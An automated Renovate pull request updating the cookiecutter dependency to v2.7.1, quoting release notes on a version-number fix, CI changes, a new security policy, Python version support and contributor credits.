Update dependency cookiecutter to v2.7.1

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
cookiecutter	2.6.0 → 2.7.1

---

Release Notes

cookiecutter/cookiecutter (cookiecutter)

v2.7.1: Cookiecutter 2.7.1: The One Where It Knows Its Own Name

Compare Source

You know that thing where you release an album, it's on the shelves, people are buying it, and then someone points out the spine says it's your previous album? That's what happened with Cookiecutter 2.7.0. We put out the long-awaited release with 27 improvements and 17 contributors, and cookiecutter -V proudly announced: 2.6.0.

$ cookiecutter -V
Cookiecutter 2.6.0

$ # narrator voice: it was not 2.6.0

Go on, run this and see for yourself that the 2.7.1 release knows its own version number now:

uv tool upgrade cookiecutter

What's fixed

cookiecutter -V now reports the real version. Rather than patch VERSION.txt, this release removes it entirely. The version is now read from package metadata at runtime, so pyproject.toml is the single source of truth and there's nothing left to drift. Thanks @​bollwyvl for the bug report PR and for suggesting the importlib.metadata approach, and thanks @​tranzystorekk for filing #​2195!

What's better

CI runs each Python version as its own job. Tests for 3.10 through 3.14 used to run sequentially inside a single job per OS, which pushed Windows past 30 minutes. Each version now runs in parallel with a 15-minute timeout. Windows tests focus on the boundary versions (3.10 and 3.14) since intermediate versions add little signal beyond Ubuntu and macOS.

Contributors

@​audreyfeldroy (Audrey M. Roy Greenfeld) and @​pydanny (Daniel Roy Greenfeld) built this release, with help from Claude roleplaying as David Bowie.

Thanks to @​bollwyvl (Nicholas Bollweg) for the version fix PR and the importlib.metadata suggestion, and @​tranzystorekk for reporting the version mismatch.

v2.7.0: 2.7.0

Compare Source

Cookiecutter 2.7.0 is tested on Python 3.10 through 3.14, ships with a security policy documenting the trust model for template hook scripts, and publishes to PyPI with cryptographic provenance so you can verify every release. Seventeen contributors from the community helped build it.

uv tool upgrade cookiecutter

What's new

A security policy that explains what you're trusting. Cookiecutter templates can run arbitrary code through hook scripts, and that's by design. The new SECURITY.md lays out the trust model: what Cookiecutter sandboxes (nothing), what's in scope for vulnerability reports, and how to report them privately through GitHub. If you maintain templates or run unfamiliar ones, this is worth reading.

Python 3.10 through 3.14. Full test coverage across five Python versions. If you're on 3.7, 3.8, or 3.9, this is the release where you'll want to upgrade.

Pretty-printed JSON in templates. The jsonify Jinja2 extension takes an indent argument, so you can generate formatted JSON in your templates instead of single-line blobs. Thanks @​pabloxio! (#​2050)

Boolean variables from the command line. Pass use_docker=y via --no-input and it arrives as a proper boolean in your template context. Thanks @​tylermilner! (#​2029)

Structured bug reports. The GitHub issue form collects environment details upfront, so maintainers can reproduce your issue faster.

Tutorial videos and slides. Conference talk recordings and slide decks linked from the docs. Thanks @​datasharp! (#​2137)

What's better

Verified PyPI releases. Every release is published via OpenID Connect (no stored API tokens) with SLSA provenance attestations. You can cryptographically verify that the package you installed was built from this repository's CI.

Same results on every OS. Template generation produces deterministic directory ordering regardless of platform. No more platform-specific file conflict surprises. Thanks @​RaulWCosta! (#​2099)

Zip-based templates release file handles immediately. No more locked-file issues on Windows when using cached zip templates. Thanks @​mohiuddin-khan-shiam! (#​2147)

Type-checked top to bottom. mypy coverage spans the entire codebase, with type hints added module by module. Thanks @​danieleades for the massive effort! (#​2015, #​2041, #​2042, #​2051, #​2053–#​2056, #​2059, #​2060)

Ruff everywhere. Linting and formatting moved from flake8/isort/black to Ruff, with expanded rule groups covering pyflakes, pygrep, perf, and string formatting. Thanks @​danieleades! (#​2012, #​2014, #​2016, #​2019, #​2020, #​2061)

Modern packaging. Config lives in pyproject.toml, with separated dependency groups for lint and test. Thanks @​jensens! (#​2040)

Clearer installation docs. The README includes pipx as an alternative, and the programmatic usage example is corrected. Thanks @​swikrityy-yy and @​christine-ho-dev! (#​2165, #​2122)

What's fixed

Empty lists in cookiecutter.json raise a clear error. A template with [] as a default value gets a helpful ValueError instead of a confusing IndexError. Thanks @​meganlkm! (#​2171)

Directory names that render to empty strings. Handled gracefully instead of failing silently. Thanks @​DanielZhangD! (#​1991)

Development dependency updates (no user impact)

The safety vulnerability scanner in the lint dependency group pulls in its own tree of transitive dependencies. These packages are never installed by pip install cookiecutter or uv tool install cookiecutter. We updated the lockfile to resolve 8 CVEs across nltk, urllib3, cryptography, authlib, filelock, and marshmallow (CVE-2025-14009, CVE-2026-21441, CVE-2026-26007, and 5 others).

No Cookiecutter user was exposed to these vulnerabilities.

Contributors

@​audreyfeldroy (Audrey M. Roy Greenfeld) designed and built this release: the security policy, Python 3.14 support, dependency hardening, bug report form, and packaging modernization.

@​pydanny (Daniel Roy Greenfeld) modernized the CI/CD workflow, migrated docs to justfile, and updated Python version support.

Thanks to:

• @​danieleades for the massive type checking and linting overhaul across the entire codebase
• @​tylermilner (Tyler Milner) for boolean CLI variable conversion
• @​pabloxio (Pablo Jaramillo) for the jsonify indent parameter
• @​RaulWCosta (Raul Wagner Costa) for deterministic directory ordering
• @​meganlkm (Megan Wood) for the empty list error handling
• @​mohiuddin-khan-shiam for proper ZipFile handle cleanup
• @​DanielZhangD (Daniel Zhang) for the directory name rendering fix
• @​jensens (Jens W. Klein) for migrating configuration to pyproject.toml
• @​kurtmckee (Kurt McKee) for upgrading to safety v3
• @​luzfcb (Fábio C. Barrionuevo da Luz) for pytest config modernization
• @​datasharp (Kayla Sharp) for tutorial video and slide links
• @​christine-ho-dev (Christine Ho) for fixing the README programmatic example
• @​swikrityy-yy (Swikriti Adhikari) for clarifying installation instructions
• @​krishivs789 (Krishiv S) for stabilizing the README logo URL
• @​Fred-si (Frédéric) for updating CONTRIBUTING.md
• @​jkomalley (Kyle) for fixing outdated README shield URLs
• @​dominiqueplante (Dominique Plante) for README updates

---

Configuration

📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.